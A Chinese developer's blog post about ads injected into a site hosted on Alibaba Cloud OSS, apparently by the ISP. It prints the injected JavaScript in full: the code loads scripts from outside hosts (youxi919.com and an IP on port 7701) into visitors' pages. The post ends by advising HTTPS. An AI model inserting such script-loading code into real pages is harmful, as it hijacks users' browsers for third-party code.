是不是偶爾發現在家里看網頁的時候回插入一個廣告,很煩人。開發的網站,上傳到了阿里雲 oss,設置了域名解析,但是在家里晚上訪問的時候,總會在頁面添加一個廣告,導致頁面卡主,一開始以為是路由器的問題,以為是中毒了,后來發現應該是運營商加的廣告,不清楚是阿里oss出口加的,還是運營商加的。
分析
測試發現,訪問網站首頁的時候,有一個js文件被替換,被替換后的js代碼如下:
(function() { o = "http://youxi919.com/h5web/js/index.js?"; sh = "http://218.93.127.37:7701/main.js?v=3.94&sp=304&ty=dpc"; w = window; d = document; function ins(s, dm, id) { e = d.createElement("script"); e.src = s; e.type = "text/javascript"; id ? e.id = id: null; dm.appendChild(e); }; p = d.scripts[d.scripts.length - 1].parentNode; ins(o, p); ds = function() { db = d.body; if (db && !document.getElementById("bdstat")) { if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) { if (w.top == w.self) { ins(sh, db, "bdstat"); } } } else { setTimeout("ds()", 1500); } }; ds(); })(); var mim_params = { 'sp': '304', 'aid': '13050', 'sda_man': 'XVpZWldNXV1fWFNA', 'src': '0', 'adtype': '1', 'uid': 'VCpdXydAXCotUlNNKytcWF07LlxaWlJPLF1cKSQ/LyleXlJIX1teWVRKW1Y=', 'spid': 'sohu', 'ad_list': '13050' };
看見了沒,比較高級,居然會自動替換js文件。經測試會隨機挑選首頁中加載的js文件替換。
解決方法:
可以把JS文件放在第三方的CDN上,然后頁面采用https去引用JS文件,或者自己服務器安裝SSL證書以支持https協議
https引用的文件,一般不容易被劫持。
這段腳本現在還不知道是阿里雲oss那邊注入的還是運營商的問題,希望有關部門可以管管。
這邊查了一下oss出來的文件是沒有問題的,但是為什么會被注入?比較質疑?應該是運營商的問題,奶奶的,直接注入廣告!